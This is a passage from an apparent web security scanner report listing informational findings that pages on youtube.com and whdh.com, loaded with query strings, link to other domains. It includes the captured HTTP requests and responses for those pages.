button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i4.ytimg.com/vi/_Psk6xbuT98/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i4.ytimg.com/vi/_1ZE5OXScTY/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i1.ytimg.com/vi/TzxoR25kf8I/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i3.ytimg.com/vi/fFAQb4WQ7lQ/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<h3><a href="http://youtube-global.blogspot.com/2010/10/1-billion-subscriptions-and-counting.html">Subscription Widget</a>
...[SNIP]...
<h3>
<a href="http://youtube-global.blogspot.com/">JoshSundquist is January...s ...On the Rise... star</a>
...[SNIP]...
<p class="alignR">
<a href="http://youtube-global.blogspot.com/">Read more in our Blog</a>
...[SNIP]...
<li><a href="http://code.google.com/apis/youtube/overview.html">Developers</a>
...[SNIP]...
<li><a href="http://www.google.com/support/youtube/bin/static.py?p=homepage&page=start.cs&hl=en_US" onmousedown="yt.analytics.trackEvent('Footer', 'link', 'Help');">Help</a>
...[SNIP]...
<li><a href="http://www.google.com/support/youtube/bin/request.py?contact_type=abuse&hl=en_US" onmousedown="yt.analytics.trackEvent('Footer', 'link', 'Safety');">Safety</a>
...[SNIP]...
</span>

<a href="http://www.google.com/tools/feedback/intl/en/error.html" onclick="return yt.www.feedback.start('en', {"accept_language": "en"});" id="reportbug">Report a bug</a>
...[SNIP]...
<div id="quicklist-player-close"><img onclick="yt.www.navigation.expandPlayer();" class="master-sprite expand-button" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"><img onclick="yt.www.navigation.closePlayer();" class="master-sprite close-button" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"></div>
...[SNIP]...
<div id="quicklist-notifications" style="display: none;" class="yt-alert yt-alert-success yt-alert-small yt-alert-naked yt-rounded">
<img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" class="icon master-sprite" alt="Alert icon">

<div class="yt-alert-content">
...[SNIP]...
pe="button" class="master-sprite yt-uix-tooltip yt-uix-tooltip-masked start start-edge yt-uix-button yt-uix-tooltip" onclick=";return false;" title="Previous video" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-prev" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button><button type="button" class="master-sprite yt-uix-tooltip yt-uix-tooltip-masked end yt-uix-button" onclick=";return false;" id="quicklist-next-button" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-next" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>
...[SNIP]...
ist-play-button" type="button" class="master-sprite yt-uix-tooltip yt-uix-tooltip-masked yt-uix-button yt-uix-tooltip" onclick=";return false;" title="Play videos" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-play" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>
...[SNIP]...
</span> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""><div style="display:none;" class="yt-uix-button-menu">
...[SNIP]...
aster-sprite yt-uix-tooltip yt-uix-tooltip-masked start quicklist-active yt-uix-button yt-uix-button-toggle" onclick=";return false;" id="quicklist-autoplay-button" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-autoplay" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>
...[SNIP]...
master-sprite yt-uix-tooltip yt-uix-tooltip-masked start quicklist-active yt-uix-button yt-uix-button-toggle" onclick=";return false;" id="quicklist-shuffle-button" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-shuffle" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button><button type="button" class="master-sprite yt-uix-tooltip yt-uix-tooltip-masked end end-edge yt-uix-button" onclick=";return false;" id="quicklist-toggle-button" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-toggle" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>
...[SNIP]...
<button class="yt-uix-button quicklist-tray-button yt-uix-slider-prev" onclick="return false;"><img class="yt-uix-slider-prev-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Previous"></button><button class="yt-uix-button quicklist-tray-button yt-uix-slider-next" onclick="return false;"><img class="yt-uix-slider-next-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Next"></button>
...[SNIP]...
<li class="empty quicklist-help-message">Your queue is empty. Add videos to your queue using this button: <img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" class="addto-button-help"><br> or <a href="https://www.google.com/accounts/ServiceLogin?uilel=3&service=youtube&passive=true&continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F%253Fhl%253Den%2526tab%253Dw1&hl=en_US&ltmpl=sso">sign in</a>
...[SNIP]...
<div id="quicklist-loading"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Loading..."><span id="quicklist-loading-message">
...[SNIP]...
<span class="yt-uix-button-menu-item " onclick="">
<a href="https://www.google.com/accounts/ServiceLogin?uilel=3&service=youtube&passive=true&continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F%253Fhl%253Den%2526tab%253Dw1&hl=en_US&ltmpl=sso">Sign in</a>
...[SNIP]...

20.715. http://www.youtube.com/subscribe_widget previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/subscribe_widget

Issue detail

The page was loaded from a URL containing a query string:

http://www.youtube.com/subscribe_widget?p=joomla

The response contains the following links to other domains:

http://i3.ytimg.com/i/Z5e4pbTFTF_Rtin9fh3_Zw/1.jpg
http://s.ytimg.com/yt/cssbin/www-subscribe-widget-vflpwxGne.css
http://s.ytimg.com/yt/img/help/youtube_icon_small-vfliqe9hM.jpg
http://s.ytimg.com/yt/img/loader-vflff1Mjj.gif
http://s.ytimg.com/yt/img/msg_icn/error_mini_tt-vflDGo6-c.gif
http://s.ytimg.com/yt/jsbin/www-subscribe-widget-vflMJanIs.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:20:43 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: GEO=0341a4aa07c201d99d06557f57bd4ecbcwsAAAAzVVOtwdbzTTzh+w==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 2953

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Subscribe to joomla</title>
<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-subscribe-widget-vflpwxGne.css">

</head>
...[SNIP]...
<a href="/user/joomla?feature=sub_widget_1" target="_top">
<img id="profile-picture" src="http://i3.ytimg.com/i/Z5e4pbTFTF_Rtin9fh3_Zw/1.jpg" alt="Profile Picture">
</a>
...[SNIP]...
<span class="spinner hid">
<img src="//s.ytimg.com/yt/img/loader-vflff1Mjj.gif" class="icon" alt="Working">
</span>
...[SNIP]...
<span id="failed_icon_subscribe" class="fail-icon hid">
<img src="//s.ytimg.com/yt/img/msg_icn/error_mini_tt-vflDGo6-c.gif" class="icon" alt="Failed">
</span>
...[SNIP]...
<span class="spinner hid">
<img src="//s.ytimg.com/yt/img/loader-vflff1Mjj.gif" class="icon" alt="Working">
</span>
...[SNIP]...
<span class="fail-icon hid">
<img src="//s.ytimg.com/yt/img/msg_icn/error_mini_tt-vflDGo6-c.gif" class="icon" alt="Failed">
</span>
...[SNIP]...
<div id="branding"><img src="//s.ytimg.com/yt/img/help/youtube_icon_small-vfliqe9hM.jpg" alt="YouTube logo"></div>

</div>

<script src="//s.ytimg.com/yt/jsbin/www-subscribe-widget-vflMJanIs.js"></script>
...[SNIP]...

20.716. http://www1.whdh.com/includes/elements/accordion_whdh previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/includes/elements/accordion_whdh

Issue detail

The page was loaded from a URL containing a query string:

http://www1.whdh.com/includes/elements/accordion_whdh?1295905242

The response contains the following link to another domain:

http://whdhstore.hipcricket.com/

Request

GET /includes/elements/accordion_whdh?1295905242 HTTP/1.1
Host: www1.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:53:57 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: accordion_whdh.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Cache-Control: max-age=3600
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:53:07 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107005 (MII-APC/1.6)
Content-Length: 3416

<div class='rbox rbox-sqbottom'><div class="rbox-t"><div class="first"><h3>Your Newscast</h3></div></div><div class="rbox-c-w"><div class='rbox-c' style='padding:0;'><div id='accordion1'><h3 rel="/i
...[SNIP]...
<div style='padding:10px;height:58px;clear:both;font-size:90%;background:#fff;border-bottom:1px solid #cfcfcf;'>
<a href='http://whdhstore.hipcricket.com/' target="_blank"><img src='/images/icons/phonealert58.gif' style='border:0;float:left;margin:0 10px 0 0;' />
...[SNIP]...
<h4 style='font-size:14px;'><a href='http://whdhstore.hipcricket.com/' target="_blank">Weather Alerts</a>
...[SNIP]...
<h4 style='font-size:14px;'><a href='http://whdhstore.hipcricket.com/' target="_blank">Breaking News Alerts</a>
...[SNIP]...

20.717. http://www1.whdh.com/includes/elements/sidecol_video_box.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/includes/elements/sidecol_video_box.php

Issue detail

The page was loaded from a URL containing a query string:

http://www1.whdh.com/includes/elements/sidecol_video_box.php?c=91535&124142

The response contains the following links to other domains:

http://whdh.images.worldnow.com/images/5494360_vt.jpg
http://whdh.images.worldnow.com/images/5494376_vt.jpg
http://whdh.images.worldnow.com/images/5494391_vt.jpg
http://whdh.images.worldnow.com/images/5495239_vt.jpg
http://whdh.images.worldnow.com/images/5495253_vt.jpg
http://whdh.images.worldnow.com/images/5495255_vt.jpg
http://whdh.images.worldnow.com/images/5495257_vt.jpg
http://whdh.images.worldnow.com/images/5495279_vt.jpg
http://whdh.images.worldnow.com/images/5495297_vt.jpg
http://whdh.images.worldnow.com/images/5495537_vt.jpg
http://whdh.images.worldnow.com/images/5495548_vt.jpg
http://whdh.images.worldnow.com/images/5495551_vt.jpg
http://whdh.images.worldnow.com/images/5495555_vt.jpg
http://whdh.images.worldnow.com/images/5495557_vt.jpg
http://whdh.images.worldnow.com/images/5495562_vt.jpg
http://whdh.images.worldnow.com/images/5495565_vt.jpg
http://whdh.images.worldnow.com/images/5495580_vt.jpg
http://whdh.images.worldnow.com/images/5495587_vt.jpg
http://whdh.images.worldnow.com/images/5496093_vt.jpg
http://whdh.images.worldnow.com/images/5496103_vt.jpg
http://whdh.images.worldnow.com/images/5496110_vt.jpg
http://whdh.images.worldnow.com/images/5496121_vt.jpg
http://whdh.images.worldnow.com/images/5496125_vt.jpg
http://whdh.images.worldnow.com/images/5496134_vt.jpg
http://whdh.images.worldnow.com/images/5496178_vt.jpg
http://whdh.images.worldnow.com/images/5496185_vt.jpg
http://whdh.images.worldnow.com/images/5497002_vt.jpg
http://whdh.images.worldnow.com/images/5497058_vt.jpg
http://whdh.images.worldnow.com/images/5497112_vt.jpg
http://whdh.images.worldnow.com/images/5497146_vt.jpg
http://whdh.images.worldnow.com/images/5497292_vt.jpg
http://whdh.images.worldnow.com/images/5497586_vt.jpg

Request

GET /includes/elements/sidecol_video_box.php?c=91535&124142 HTTP/1.1
Host: www1.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; __utmc=208585492; __utmb=208585492.1.10.1295906131; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; ACC1TAB=1

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:21:51 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 325
Cache-Control: max-age=17181
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 03:07:22 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 mdw107101 (MII-APC/1.6)
Content-Length: 14241

<div class='slidethumbs3' id="vdthmbz3-1"><ul><li><a href='http://www1.whdh.com/video/player/?clipId=5497586&clipFormat=flv&topVideoCatNo=91535#?autoStart' title='<h3>Frozen pipes in Newton</h3><p>NEW
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5497586_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5497292_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5497146_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5497112_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5497058_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5497002_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496185_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496178_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496134_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496125_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496121_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496110_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496103_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496093_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495587_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495580_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495565_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495562_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495557_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495555_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495551_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495548_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495537_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495297_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495279_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495257_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495255_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495253_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495239_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5494391_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5494376_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5494360_vt.jpg' width='133' height='74' /></a>
...[SNIP]...

20.718. http://www1.whdh.com/includes/elements/sidecol_video_box.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/includes/elements/sidecol_video_box.php

Issue detail

The page was loaded from a URL containing a query string:

http://www1.whdh.com/includes/elements/sidecol_video_box.php?c=91535&124142

The response contains the following links to other domains:

http://whdh.images.worldnow.com/images/5494355_vt.jpg
http://whdh.images.worldnow.com/images/5494360_vt.jpg
http://whdh.images.worldnow.com/images/5494376_vt.jpg
http://whdh.images.worldnow.com/images/5494391_vt.jpg
http://whdh.images.worldnow.com/images/5495239_vt.jpg
http://whdh.images.worldnow.com/images/5495253_vt.jpg
http://whdh.images.worldnow.com/images/5495255_vt.jpg
http://whdh.images.worldnow.com/images/5495257_vt.jpg
http://whdh.images.worldnow.com/images/5495279_vt.jpg
http://whdh.images.worldnow.com/images/5495297_vt.jpg
http://whdh.images.worldnow.com/images/5495537_vt.jpg
http://whdh.images.worldnow.com/images/5495548_vt.jpg
http://whdh.images.worldnow.com/images/5495551_vt.jpg
http://whdh.images.worldnow.com/images/5495555_vt.jpg
http://whdh.images.worldnow.com/images/5495557_vt.jpg
http://whdh.images.worldnow.com/images/5495562_vt.jpg
http://whdh.images.worldnow.com/images/5495565_vt.jpg
http://whdh.images.worldnow.com/images/5495580_vt.jpg
http://whdh.images.worldnow.com/images/5495587_vt.jpg
http://whdh.images.worldnow.com/images/5496093_vt.jpg
http://whdh.images.worldnow.com/images/5496103_vt.jpg
http://whdh.images.worldnow.com/images/5496110_vt.jpg
http://whdh.images.worldnow.com/images/5496121_vt.jpg
http://whdh.images.worldnow.com/images/5496125_vt.jpg
http://whdh.images.worldnow.com/images/5496134_vt.jpg
http://whdh.images.worldnow.com/images/5496178_vt.jpg
http://whdh.images.worldnow.com/images/5496185_vt.jpg
http://whdh.images.worldnow.com/images/5497002_vt.jpg
http://whdh.images.worldnow.com/images/5497058_vt.jpg
http://whdh.images.worldnow.com/images/5497112_vt.jpg
http://whdh.images.worldnow.com/images/5497146_vt.jpg
http://whdh.images.worldnow.com/images/5497292_vt.jpg

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 19:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 8018
Cache-Control: max-age=17051
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 00:25:04 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107002 (MII-APC/1.6)
Content-Length: 14226

<div class='slidethumbs3' id="vdthmbz3-1"><ul><li><a href='http://www1.whdh.com/video/player/?clipId=5497292&clipFormat=flv&topVideoCatNo=91535#?autoStart' title='<h3>Students evacuated from school</h
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5497292_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5497146_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5497112_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5497058_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5497002_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496185_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496178_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496134_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496125_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496121_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496110_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496103_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496093_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495587_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495580_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495565_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495562_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495557_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495555_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495551_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495548_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495537_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495297_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495279_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495257_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495255_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495253_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495239_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5494391_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5494376_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5494360_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5494355_vt.jpg' width='133' height='74' /></a>
...[SNIP]...

20.719. http://www1.whdh.com/video/player/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/video/player/

Issue detail

The page was loaded from a URL containing a query string:

http://www1.whdh.com/video/player/?clipId=5497227&clipFormat=flv&topVideoCatNo=72115

The response contains the following links to other domains:

http://www.cw56.com/
http://www.facebook.com/7NEWS
http://www.google.com/jsapi
http://www.twitter.com/7News

Request

GET /video/player/?clipId=5497227&clipFormat=flv&topVideoCatNo=72115 HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:10 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=58
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 21:57:17 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 22068
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS Video</title>
<meta name="publisher" content="New England News Station
...[SNIP]...
